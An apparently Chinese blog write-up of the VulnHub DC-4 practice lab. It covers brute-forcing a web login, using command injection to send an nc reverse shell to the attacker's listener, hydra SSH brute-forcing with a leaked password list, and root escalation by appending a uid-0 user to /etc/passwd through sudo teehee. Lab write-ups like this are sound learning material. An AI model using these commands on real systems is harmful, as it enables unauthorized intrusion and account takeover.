靶场搭建
靶场下载地址:https://download.vulnhub.com/dc/DC-4.zip
攻击机和靶机都是nat模式,同一网段,用nmap扫描到靶机ip及开放端口
访问了80端口,是个登陆页面,啥也没有
扫了下目录,也啥也没有
那试试爆破吧
好吧,我作弊了,最开始整的俩超大字典,这一顿爆,大半天过去了进度刚刚露头。。
换了个小的,然后对admin账号爆破,得到密码happy
进来是这么个东西
好像是个命令执行的接口啊
抓包看一下
可以任意命令执行
反弹shell到kali
攻击机监听6789端口
nc -lvvp 6789
nc反弹,空格用+代替
radio=nc±e+/bin/bash+192.168.67.136+6789&submit=Run
成功连接
然后咋提权呢,又开始脑袋疼了
compgen -c
查一下可执行命令
compgen -c
if
then
else
elif
fi
case
esac
for
select
while
until
do
done
in
function
time
{
}
!
[[
]]
coproc
.
:
[
alias
bg
bind
break
builtin
caller
cd
command
compgen
complete
compopt
continue
declare
dirs
disown
echo
enable
eval
exec
exit
export
false
fc
fg
getopts
hash
help
history
jobs
kill
let
local
logout
mapfile
popd
printf
pushd
pwd
read
readarray
readonly
return
set
shift
shopt
source
suspend
test
times
trap
true
type
typeset
ulimit
umask
unalias
unset
wait
grub-file
neqn
systemd-socket-activate
eqn
perl
gcov
apt-get
expiry
lzma
grog
scriptreplay
dwp
rev
pgrep
i686-linux-gnu-size
bootctl
apt-ftparchive
nl
sha224sum
lesskey
tasksel
tac
timeout
dh_bash-completion
strip
sha384sum
i686-linux-gnu-ranlib
systemd-delta
i386
ctstat
python2
loadkeys
taskset
gencat
fallocate
python3m
i686-linux-gnu-nm
pycompile
readmsg.mailutils
dbus-update-activation-environment
tic
encguess
i686-linux-gnu-gcov-6
traceroute.db
defmt-c
rsh
look
systemd-analyze
mk_modmap
skill
python3
c99
dpkg-statoverride
faked-tcp
base32
munchlist
printerbanner
slabtop
dbus-monitor
nohup
c99-gcc
hd
showkey
pdb3.5
rlogin
i586-linux-gnu-gcov-dump
py3clean
apt-cache
mailq
du
tabs
gcov-6
sg
patch
systemd-detect-virt
pydoc3
phar
readmsg
w.procps
xz
top
gcc-nm
icombine
rgrep
groups
flock
pcimodules
i686-linux-gnu-gcc-ar
instmodsh
utmpdump
i686-linux-gnu-strip
size
lzmore
manpath
gcc-6
setkeycodes
seq
kbxutil
ex
nice
ipcs
unshare
clear_console
mailx
gcov-dump
buildhash
lzfgrep
cut
pstruct
[
pydoc3.5
unlink
i686-linux-gnu-gcc
traceroute-nanog
col
ckbcomp
strings
i586-linux-gnu-gcov-tool
tbl
base64
systemd-mount
phar.phar7.0
grub-menulst2cfg
lcf
id
systemd-cgtop
systemd-resolve
logname
eject
stat
i686-linux-gnu-strings
pwdx
getopt
rename
edit
debconf-set-selections
sieve
setsid
tee
lsb_release
troff
gcc-nm-6
file
hostid
i686-linux-gnu-gcc-ranlib-6
gpgsplit
busctl
mcookie
rtstat
lzdiff
gpg-zip
frm
sdiff
see
linux-update-symlinks
bsd-mailx
xzcmp
diff
xzcat
sensible-pager
pod2man
2to3-3.5
migrate-pubring-from-classic-gpg
printf
dh_installxmlcatalogs
unmkinitramfs
debconf
lessecho
dpkg-gensymbols
nproc
lzcmp
killall
pinentry-curses
traceroute6.db
i686-linux-gnu-gcc-nm-6
mimeview
deallocvt
gpasswd
prtstat
apt-cdrom
grub-mount
lorder
tty
ptargrep
head
pod2html
touch
grub-fstest
gpg
psfstriptable
chfn
pmap
libnetcfg
scp
systemd-path
reportbug
splitfont
lzmainfo
pico
addr2line
rview
groff
2to3-2.7
man
run-mailcap
tail
diff3
pygettext2.7
tzselect
grub-glue-efi
lsattr
factor
lscpu
env
i686-linux-gnu-g++-6
python3.5
lsinitramfs
od
vim.tiny
ldd
dumpkeys
psfgettable
grub-editenv
basename
clear
prename
pod2usage
dpkg-checkbuilddeps
grub-kbdcomp
tsort
i686-linux-gnu-cpp-6
py3versions
report-hw
telnet
last
traceproto
gcc-ranlib-6
grops
podselect
unlzma
i686-linux-gnu-gcc-nm
g++-6
i686-linux-gnu-c++filt
xzgrep
ssh
addpart
hexdump
printenv
routef
dbus-daemon
php
perlivp
readelf
traceroute6
frm.mailutils
linux-version
resizecons
grub-mkrelpath
setlogcons
grotty
pdb3
lessfile
mawk
os-prober
setmetamode
mail
watch
setarch
c++filt
w
routel
grub-mkimage
lspci
pg
lsns
infotocap
hostnamectl
i586-linux-gnu-gcc-ar
getkeycodes
ucf
discover-config
sudo
perlthanks
dpkg-distaddfile
usbhid-dump
chrt
pinky
chattr
dbus-uuidgen
i686-linux-gnu-as
gcov-dump-6
systemd-run
mailutils
pinentry
i686-linux-gnu-readelf
ptx
cc
showconsolefont
dotlock.mailutils
install
tr
savelog
grub-mknetdir
cksum
xsubpp
catchsegv
uptime
make-first-existing-target
md5sum.textutils
dbus-send
from
renice
systemd-stdio-bridge
grub-mkpasswd-pbkdf2
uniq
pl2pm
xzmore
objdump
mesg
whiptail
i686-linux-gnu-dwp
lft
i686-linux-gnu-addr2line
wall
ngettext
lastb
ul
i586-linux-gnu-gcc-nm
ijoin
gpg-connect-agent
xauth
dotlockfile
pager
i586-linux-gnu-cpp
namei
join
catman
pygettext
unicode_stop
whatis
c++
sotruss
yes
timedatectl
debconf-show
b2sum
vi
movemail.mailutils
gtbl
apt-sortpkgs
snice
tput
teehee
shred
wget
gcov-tool-6
delpart
find
pygettext3
ssh-keyscan
dpkg-architecture
i686-linux-gnu-gprof
dpkg-shlibdeps
setleds
i686-linux-gnu-ld.bfd
soelim
resizepart
cpp
i686-linux-gnu-g++
colcrt
pyversions
envsubst
psfaddtable
i686-linux-gnu-gcc-ar-6
chsh
host
truncate
unsq
realpath
perlbug
csplit
movemail
i686-linux-gnu-gcov-dump
lexgrog
mkfifo
unxz
i686-linux-gnu-gcov-tool
chage
dpkg-deb
grub-syslinux2cfg
xxd
phar.phar
setpci
lzless
dpkg-source
ssh-keygen
compose
h2ph
dpkg-scanpackages
h2xs
newaliases
fold
i686-linux-gnu-ld.gold
ld
gpgparsemail
gcc-ar-6
file-rename
perldoc
nsenter
cpp-6
ncal
dpkg-divert
gold
localedef
perl5.24.1
sprof
querybts
reset
dpkg-genchanges
kernel-install
lslogins
dpkg-split
peekfd
chcon
i686-linux-gnu-gcov-dump-6
grub-mkstandalone
sq
objcopy
lft.db
lastlog
ispell-wrapper
ld.bfd
dirname
corelist
script
lspgpot
gpgv
dh_pypy
link
whoami
lsof
arch
ionice
sudoreplay
dotlock
bsd-from
mandb
faked-sysv
vmstat
grub-mkfont
mail.mailutils
less
localectl
i686-linux-gnu-objcopy
deb-systemd-invoke
sha512sum
ssh-add
ssh-copy-id
make
lesspipe
xzdiff
gettext.sh
traceroute
calendar
sudoedit
faillog
which
cmp
fakeroot-sysv
i686-linux-gnu-gcc-6
lzgrep
g++
sort
geqn
i686-linux-gnu-gcov
enc2xs
systemd-cgls
podchecker
fakeroot
dbus-cleanup-sockets
bsd-write
pstree
logger
numfmt
newgrp
ptar
apt-key
on_ac_power
i686-linux-gnu-ld
dpkg-buildflags
piconv
tload
xargs
infocmp
update-alternatives
linux32
2to3
toe
sha1sum
i686-linux-gnu-objdump
prove
linux-check-removal
sftp
setvtrgb
wc
tset
dpkg
i686-linux-gnu-elfedit
rcp
dh_python2
dircolors
slogin
gpic
symcryptrun
grub-mkrescue
grub-ntldr-img
ptardiff
dpkg-genbuildinfo
usb-devices
perl5.24-i386-linux-gnu
rename.ul
shasum
elfedit
codepage
nroff
nawk
i586-linux-gnu-gcov
perf
comm
cpan5.24-i386-linux-gnu
grub-script-check
messages.mailutils
free
dpkg-gencontrol
ssh-agent
watchgnupg
c_rehash
c2ph
dpkg-name
fmt
from.mailutils
expr
pldd
xzegrep
fakeroot-tcp
pybuild
pr
locale
apt-config
mtrace
grub-mklayout
dpkg-buildpackage
splain
messages
dpkg-trigger
whereis
pathchk
i586-linux-gnu-gcc
apt-mark
openssl
runcon
lsipc
as
lzcat
dpkg-scansources
chardet3
gcov-tool
split
debconf-copydb
awk
i686-linux-gnu-ar
ld.gold
lslocks
gpgconf
dpkg-query
tryaffix
systemd-cat
select-editor
passwd
xzless
dpkg-vendor
ipcrm
screendump
volname
lsusb
pygettext3.5
xzfgrep
pyclean
dpkg-maintscript-helper
editor
nstat
dh_python3
gcc-ranlib
telnet.netkit
line
zdump
pod2text
users
gettext
captoinfo
python
iconv
apt-extracttemplates
view
i686-linux-gnu-gcov-tool-6
apropos
iptables-xml
pydoc2.7
shuf
dbus-run-session
prlimit
python3.5m
Mail
php7.0
ischroot
findaffix
test
pdb
ranlib
sha256sum
sensible-browser
getent
pstree.x11
i686-linux-gnu-gcc-ranlib
gcc
pic
pkill
ispell
zipdetails
grub-render-label
loadunimap
nm
sum
expand
unexpand
py3compile
paste
helpztags
getconf
pdb2.7
python2.7
linux64
defmt-sh
dpkg-parsechangelog
stdbuf
md5sum
partx
c89
deb-systemd-helper
apt
column
print
lzegrep
i586-linux-gnu-gcc-ranlib
chardetect3
crontab
linux-boot-prober
gpg-agent
select-default-iwrap
i586-linux-gnu-g++
kbdinfo
setterm
gcc-ar
preconv
who
sensible-editor
mapscrn
cal
rpcgen
pydoc
dpkg-mergechangelogs
psfxtable
gprof
traceproto.db
ucfq
debconf-apt-progress
debconf-communicate
cpan
apt-listchanges
i686-linux-gnu-cpp
ar
colrm
c89-gcc
json_pp
ssh-argv0
lnstat
ipcmk
phar7.0
write
ucfr
debconf-escape
bashbug
update-default-wordlist
groupadd
applygnupgdefaults
useradd
e4crypt
pam_timestamp_check
pwunconv
sshd
tarcat
maidag
exim_dumpdb
filefrag
exim_lock
exicyclog
grub-reboot
pwck
adduser
update-rc.d
tcptraceroute
invoke-rc.d
cron
exim_dbmbuild
vcstime
update-dictcommon-hunspell
grpck
update-xmlcatalog
dpkg-reconfigure
nginx-debug
select-default-ispell
nologin
chgpasswd
remove-default-ispell
exim
exim_convert4r4
exim_checkaccess
nginx
pam-auth-update
exim4
accessdb
exigrep
remove-shell
dpkg-preconfigure
genl
zic
addgnupghome
e4defrag
pam_getenv
grub-install
grub-macbless
rsmtp
update-exim4.conf.template
phpquery
grub-mkdevicemap
update-mime
cppw
setvesablank
cpgr
vipw
deluser
dmidecode
ownership
mkinitramfs
biosdecode
select-default-wordlist
exiwhat
readprofile
safe_finger
rmt
userdel
phpdismod
usermod
tcpd
validlocale
pwconv
sendmail
delgroup
arpd
locale-gen
mklost+found
ldattach
update-grub2
exinext
phpenmod
tzconfig
ip6tables-apply
ispell-autobuildhash
update-ca-certificates
grub-bios-setup
chroot
try-from
grub-mkconfig
update-initramfs
runq
aspell-autobuildhash
vpddecode
rsyslogd
addgroup
syslog2eximlog
iptables-apply
update-catalog
rmail
update-exim4defaults
install-sgmlcatalog
traceroute
upgrade-from-grub-legacy
tcpdchk
exim_tidydb
laptop-detect
update-usbids
php-fpm7.0
e2freefrag
tcpdmatch
update-pciids
exiqsumm
exim_fixdb
update-exim4.conf
vigr
rmt-tar
eximstats
grub-set-default
logrotate
tunelp
iconvconfig
groupdel
update-grub
grpunconv
service
fdformat
update-passwd
chpasswd
remove-default-wordlist
tcptraceroute.db
grpconv
groupmod
groupmems
newusers
exiqgrep
update-default-ispell
exipick
nfnl_osf
update-locale
update-default-aspell
rtcwake
add-shell
visudo
grub-probe
update-dictcommon-aspell
udevadm
lesskey
uncompress
journalctl
bzip2
loadkeys
readlink
open
bzexe
rnano
nc
true
bzfgrep
gunzip
uname
rm
dash
gzip
rmdir
ip
ss
chmod
systemd-ask-password
dnsdomainname
rbash
mv
zdiff
netcat
bash
chgrp
hostname
openvt
lessecho
more
dmesg
touch
false
ps
systemd-tty-ask-password-agent
nc.traditional
mount
umount
busybox
vdir
dumpkeys
loginctl
bzmore
zgrep
kill
bzcmp
setfont
fgrep
lessfile
stty
sync
bzip2recover
lsblk
bzdiff
su
tailf
ping4
systemd-notify
setupcon
systemd-tmpfiles
zcat
systemd-inhibit
lsmod
ping6
run-parts
zcmp
zfgrep
networkctl
fuser
kbd_mode
systemctl
mkdir
pwd
tar
bzgrep
bzless
systemd
mknod
less
df
lesspipe
which
mt-gnu
nisdomainname
login
ping
sleep
grep
nano
chown
echo
bzcat
cat
ln
zegrep
pidof
cp
unicode_start
zless
systemd-hwdb
dir
bzegrep
zforce
mt
znew
sh.distrib
wdctl
chvt
bunzip2
sed
dd
mountpoint
systemd-sysusers
tempfile
findmnt
systemd-escape
mktemp
egrep
kmod
date
domainname
zmore
gzexe
sh
ls
systemd-machine-id-setup
fgconsole
ypdomainname
cpio
udevadm
kbdrate
killall5
resize2fs
sysctl
isosize
unix_chkpwd
mkfs.ext4
fdisk
ip
dmsetup
iptables-restore
ip6tables-save
mkfs.ext2
swaplabel
reboot
runlevel
rtacct
swapon
badblocks
dumpe2fs
fsck.minix
ifquery
pivot_root
mkfs
insmod
discover
raw
ifdown
zramctl
discover-pkginstall
e2undo
unix_update
dmstats
e2fsck
logsave
mkfs.minix
halt
mkfs.bfs
telinit
modprobe
hdparm
blkid
fsck.ext2
installkernel
tc
findfs
ifup
fstab-decode
lsmod
iptables-save
pam_tally2
swapoff
fsfreeze
blkdeactivate
fstrim
shadowconfig
wipefs
mkswap
init
fsck.ext3
fsck.ext4
getty
devlink
rtmon
losetup
e2label
ip6tables
sfdisk
mke2fs
mkhomedir_helper
iptables
pam_tally
on_ac_power
apm_available
shutdown
acpi_available
modinfo
dhclient-script
hwclock
ip6tables-restore
sulogin
e2image
runuser
fsck
start-stop-daemon
xtables-multi
discover-modprobe
dhclient
blkdiscard
tune2fs
rmmod
blockdev
switch_root
mkfs.cramfs
ctrlaltdel
tipc
bridge
debugfs
agetty
fsck.cramfs
ldconfig
cfdisk
chcpu
poweroff
depmod
mkfs.ext3
这个shell好难用
python 标准虚拟终端获取
我们通过各种方式获取的shell经常不稳定或者没有交互界面的原因,往往都是因为我们获取的shell不是标准的虚拟终端,此时我们其实可以借助于python来获取一个标准的虚拟终端环境。python在现在一般发行版Linux系统中都会自带,所以使用起来也较为方便,即使没有安装,我们手动安装也很方便。
使用python 一句话获取标准shell的具体命令如下:
python -c "import pty;pty.spawn('/bin/bash')"
命令详解:python 默认就包含有一个pty的标准库。
内容引用————【技术分享】linux各种一句话反弹shell总结——攻击者指定服务端,受害者主机(无公网IP)主动连接攻击者的服务端程序(CC server),开启一个shell交互,就叫反弹shell。
在home目录下看到了三个用户
试了试提权,,没成
发现了一个旧密码备份文件
这是个啥,看起来像个字典。。我以为进去之后是用户名密码呢
www-data@dc-4:/home/jim/backups$ cat old-passwords.bak
cat old-passwords.bak
000000
12345
iloveyou
1q2w3e4r5t
1234
123456a
qwertyuiop
monkey
123321
dragon
654321
666666
123
myspace1
a123456
121212
1qaz2wsx
123qwe
123abc
tinkle
target123
gwerty
1g2w3e4r
gwerty123
zag12wsx
7777777
qwerty1
1q2w3e4r
987654321
222222
qwe123
qwerty123
zxcvbnm
555555
112233
fuckyou
asdfghjkl
12345a
123123123
1q2w3e
qazwsx
loveme1
juventus
jennifer1
!~!1
bubbles
samuel
fuckoff
lovers
cheese1
0123456
123asd
999999999
madison
elizabeth1
music
buster1
lauren
david1
tigger1
123qweasd
taylor1
carlos
tinkerbell
samantha1
Sojdlg123aljg
joshua1
poop
stella
myspace123
asdasd5
freedom1
whatever1
xxxxxx
00000
valentina
a1b2c3
741852963
austin
monica
qaz123
lovely1
music1
harley1
family1
spongebob1
steven
nirvana
1234abcd
hellokitty
thomas1
cooper
520520
muffin
christian1
love13
fucku2
arsenal1
lucky7
diablo
apples
george1
babyboy1
crystal
1122334455
player1
aa123456
vfhbyf
forever1
Password
winston
chivas1
sexy
hockey1
1a2b3c4d
pussy
playboy1
stalker
cherry
tweety
toyota
creative
gemini
pretty1
maverick
brittany1
nathan1
letmein1
cameron1
secret1
google1
heaven
martina
murphy
spongebob
uQA9Ebw445
fernando
pretty
startfinding
softball
dolphin1
fuckme
test123
qwerty1234
kobe24
alejandro
adrian
september
aaaaaa1
bubba1
isabella
abc123456
password3
jason1
abcdefg123
loveyou1
shannon
100200
manuel
leonardo
molly1
flowers
123456z
007007
password.
321321
miguel
samsung1
sergey
sweet1
abc1234
windows
qwert123
vfrcbv
poohbear
d123456
school1
badboy
951753
123456c
111
steven1
snoopy1
garfield
YAgjecc826
compaq
candy1
sarah1
qwerty123456
123456l
eminem1
141414
789789
maria
steelers
iloveme1
morgan1
winner
boomer
lolita
nastya
alexis1
carmen
angelo
nicholas1
portugal
precious
jackass1
jonathan1
yfnfif
bitch
tiffany
rabbit
rainbow1
angel123
popcorn
barbara
brandy
starwars1
barney
natalia
jibril04
hiphop
tiffany1
shorty
poohbear1
simone
albert
marlboro
hardcore
cowboys
sydney
alex
scorpio
1234512345
q12345
qq123456
onelove
bond007
abcdefg1
eagles
crystal1
azertyuiop
winter
sexy12
angelina
james
svetlana
fatima
123456k
icecream
popcorn1
另外两个文件,一个读不了,另一个脚本可以读
想起来还有个22端口,爆破一下ssh吧
用上面三个用户和给的字典try一下
hydra -L C:\Users\Administrator\Desktop\dc4.txt -P C:\Users\Administrator\Desktop\sshpass.txt ssh://192.168.67.144
爆出来一个。。。
jim/jibril04
进来了。。
在目录下看到了charles的密码^xHhA&hvim0y
sudo -l :列出当前用户可以执行的指令
新建一个root2用户
echo "root2::0:0:::/bin/bash" |sudo teehee -a /etc/passwd
知识点(敲黑板了:
1、管道符号,是unix一个很强大的功能,符号为一条竖线:“|”。
用法: 命令 1 | 命令 2
功能是把第一个命令,即命令 1执行的结果作为命令 2的输入传给命令 2
例如命令:
cat test.txt | wc -l
命令功能拆解:
cat test.txt命令功能是打印test.txt文件内容(行数)。
wc -l命令完成行数统计。
整个命令功能就是将cat test.txt的执行结果,通过管道符|,传给后一个命令wc -l,作为wc -l命令的执行对象。
即上述两个命令结合管道符完成对test.txt文件的行数统计。
2、teehee提权
teehee命令:teehee命令可以往一个文件中追加内容,可以通过这个命令向/etc/passwd中追加一个超级用户。
teehee参数-a:追加到指定文件,不覆盖原文件。/etc/passwd文件的结构:用户名:是否有密码保护(x即有保护):uid:gid:描述性信息:home目录:默认shell
uid=gid=0为超级用户,默认shell一般为/bin/bash。提权命令命令:echo “test007::0:0:::/bin/bash” | sudo teehee -a /etc/passwd
作用:添加一个用户名为hacker,没有密码的超级用户。思路:通过teehee命令追加一个超级用户,再切换到这个超级用户登录。
这块我一直失败,看了好几个教程,加了好多账号,都没能登录
日了狗了不知道哪里出了问题
上面的账户就是登不进去,su root2提示要输入密码
不死心一定要找出原因,折腾了好几天
最后重新导入了一遍靶机,就好了,我也没改什么东西啊,不知道哪里抽抽了
扫一扫
1300
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
